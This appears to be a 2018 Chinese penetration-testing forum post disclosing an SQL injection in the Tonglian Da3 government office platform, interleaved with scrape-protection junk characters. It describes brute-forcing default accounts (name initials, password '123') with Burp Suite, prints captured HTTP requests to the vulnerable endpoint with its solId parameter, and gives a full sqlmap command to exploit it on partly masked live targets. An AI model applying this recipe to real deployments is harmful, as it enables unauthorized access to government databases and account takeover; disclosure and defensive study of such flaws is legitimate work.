中国网络渗透测试联盟

标题: 同联Da3协同办公平台前台通用sql injection漏洞 [打印本页]
作者: admin    时间: 2018-10-20 20:15
标题: 同联Da3协同办公平台前台通用sql injection漏洞

3 K9 D% u1 W4 E2 } {
2 M9 J9 m9 H& e7 W* ]( Y1 b; A

' j+ Y* K: C9 c2 k+ y6 n7 s

* @, O: s2 O x2 J8 v' [ 平台简介: 1 e5 W1 x |+ b3 u# Y

# d5 n @" o- u b( p( U

( c2 S7 h7 x Q3 X  & _5 c2 h$ C, [* o: q

; ]3 V$ v! w4 }- {, }! C! m8 F! N

0 K% x f, L% f1 o 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
8 `9 y/ }9 I) N2 f" J; _ 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
: }9 ?1 W1 Q, I2 M5 T 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!3 U }" \0 I$ ^

! ]5 Q. T6 m0 I6 d5 J8 L

# N. T7 D9 `4 @6 N, I `( v  ) ^9 D8 K$ r Z; ~7 @* y. T

+ l" T- Q3 I4 w" q+ R3 j( G

7 m; l# T G* Z 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:6 | z' ^, q3 A- C

' o5 T2 j- |3 A; C

% d- h0 j1 i. U  * o' N/ k- J+ U4 I

( M0 ?, s1 C; X% \1 a) H

$ p$ O1 H3 i3 W: X: l( \ http://1.1.1.1:7197/cap-aco/#(案例2-) 3 h; `5 {1 \* I1 t7 s

2 c; r2 \: k- v. _$ k, W

# Z8 \5 c2 N% m$ _" Q http://www.XXOO.com (案例1-官网网站)! B3 E& d" p9 R0 T: Y

3 Y E' h( d4 N& ~3 Y: S

' b; J+ h$ @+ H0 x4 e3 t   + B* e( c* c* @- i+ @

! p# c4 [" ~& ^$ d: h2 r

3 F! e0 W% \6 X. |* P, \" i 漏洞详情:. d) A' j; z7 ?" B; f* W

+ ~/ S# l- r: t7 s, a' ^$ }

9 _ E. L! N, \/ ?3 Q4 @$ R* f  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试$ O2 c. g& X5 P4 D

6 [3 E3 O1 v3 \' l- L; V I( h

- q9 X2 K7 s9 H# m      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: . U L% B6 x2 D. _- S9 ]! Z

& x3 w9 \, |$ n+ E4 S

: @% w4 y" J4 h* X7 r. Y% Q   ( W/ H+ Z) V* U3 Q

; Q0 I) f& u! @$ T( k8 P

% o6 A7 y9 q; o9 f$ y v9 s3 P3 g  , L4 @1 l5 V- L1 t& B

0 a1 g5 N" U c' i

! a7 q9 s5 c7 Z( K status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: 8 P! |; }( p' j3 d* ^

. L5 F' Q8 H6 B0 `3 h

0 A. [! g% U3 T$ g E, j6 W 1、案例1-官方网站2 p" d9 Y& @( r; l7 q3 k

7 [. _; w! t4 y% D( ?% [% K$ N

' P7 I2 @ F1 m9 u. I GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 % u. F0 R' @: X) y; ]

# O! a, c3 p# Z8 h( o

$ G0 T7 `4 R2 P: {: n( Q) D Host: www.XXOO.com1 F# e: k6 z8 q3 [+ L0 u8 z5 H4 w5 Q

( \' Y( T5 s. k" |. ?6 j

6 l" }3 r7 W/ |/ J4 P" N. k7 p Proxy-Connection: Keep-Alive ; S2 I0 }" q8 l

( R( G( y$ x( o2 u

1 s! |* ]& N; [8 L Accept: application/json, text/javascript, */*; q=0.019 J+ X+ N8 ]% K+ \' l- T

9 [6 s; |$ p& l6 T1 r F- H

2 P4 Y& K8 e1 _% j5 w Accept-Language: zh-CN) @7 \4 {) t" E8 c) ~* z% p6 r

4 h$ X6 V1 O* P" h

8 u7 e! n F' U- @# Y7 J$ Q: D Content-Type: application/json" b! ^- } y1 f' `3 b3 J, b

# h; \' k6 G& G8 @

* c8 r3 A: d8 v4 m User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko+ B5 n3 u7 e+ d& M2 Y7 `0 B

/ f* S4 O6 j; [, R5 V9 e& w8 e- q

1 T6 t" {$ {9 i- A: c X-Requested-With: XMLHttpRequest 0 J: W, A$ u9 F3 u0 c4 ~

% L/ i; |1 t$ q( C/ H, u% S

: g* V# d& f$ m) u. a8 P Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 2 e, D, T) X0 F1 v5 V* w4 _

# ^3 x$ G. W8 i% [' X

5 O. W T: d3 X, w Accept-Encoding: gzip, deflate, sdch& K2 x% \. C* x# ]

6 E3 ] E9 Q# I' a7 b

: \8 B! n# S" E0 T+ V Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e+ ^9 \" h8 H, z( P

' b3 ]: u, J1 d @

5 ^6 S& V. z4 V% j2 `5 w 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: + m: ]& N4 \- f8 p6 S! x6 h

' a* \- y" y, c4 M, O

9 `' g3 u; E- R) M8 S7 Q7 z, ]% F   & J" |7 P' j2 c

8 _, d/ t2 b: k2 a

) f& J0 X" \ B. v7 z7 w  ( Z6 ~# y3 e' H; Y4 Y8 Z* G

+ t* d1 Z4 X0 M

1 T1 E" @3 w# q `. {. b& U2 I   y- L+ S B3 r

[" {2 Y& o: Q5 m4 S/ m6 q

6 @/ |+ Q" D" c+ {& Q  " N: v/ {5 {& O2 ^' i9 R

/ j$ r0 B( Z" Q; Q4 ?- j9 o

* y9 R& l n; |1 C. c" h' J: m   ) y0 C$ t& Y; c

1 Q# r \0 R( f# Y$ s' Y& q' Y9 Z

A1 ~+ G8 p* G/ F+ K W 2、案例2-某天河云平台) e1 Q' d* h* J1 v7 p# }

. Y: ?) O; B x

4 S" F2 s$ c G) y3 O% H- f GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1# S3 z. ?8 O' Y1 ~6 D

" b" Y$ O6 g; N- a

; Z; q: }8 h1 q5 ~, J* f Host: 1.1.1.:7197 6 \- L( d: C1 ?7 W

. `5 |4 U: g9 q- j. N6 b) K

1 @4 p6 R" T; s% D8 J2 j2 L Accept: application/json, text/javascript, */*; q=0.01 1 c: |" z! h: T" s

! M+ o5 A# t. g

9 E' l$ i& K! z) h; @$ f X-Requested-With: XMLHttpRequest) I3 n" w+ D+ S8 s5 k( [7 i8 ?- h

I0 d7 Q; G& G d* V1 O

6 c! N8 Z- L2 G$ r User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 7 b* z3 A6 J' \

; o: U& @& v; s1 K2 t% a

& M) M7 S9 ^* _; N: A/ ~$ X Content-Type: application/json " G, ]( _1 h" e/ N9 K

& L; r, k! C% n+ g& ^0 y+ n

) l/ p/ A) b6 g& J7 r M, y7 ^ Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10081 t! g9 m2 G6 K. M2 _1 \; B

' \; m) ^: T& c8 m

+ E# @/ W* L0 L- W Accept-Language: zh-CN,zh;q=0.8 % v6 o$ \% m- _. X a

, l. P, h# N! }# e$ l! Y( M+ N: E" E

4 o# L. P; O& u$ i7 s Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 5 F7 \+ C/ |/ s/ l6 \% R

9 r1 G: u1 X' Q9 F! Z3 n2 A2 `

* z( d. q4 e! ~ Connection: close / x3 z) f& U' R( s, N$ V

8 s1 l' D1 g' Z

# ?, V0 o+ ^" a x 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:+ z7 |! u" i( a4 ?

8 K( Z& X3 o3 O, Y+ ~4 m- K( p' b

$ C1 h$ }2 g5 _5 b% @   - p) p- L4 Q8 U' m, F

/ i( y; _/ z! f8 N; G+ J

" q' c% x* X* l# t& F+ f
" ]# e6 {& R' ]! S





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2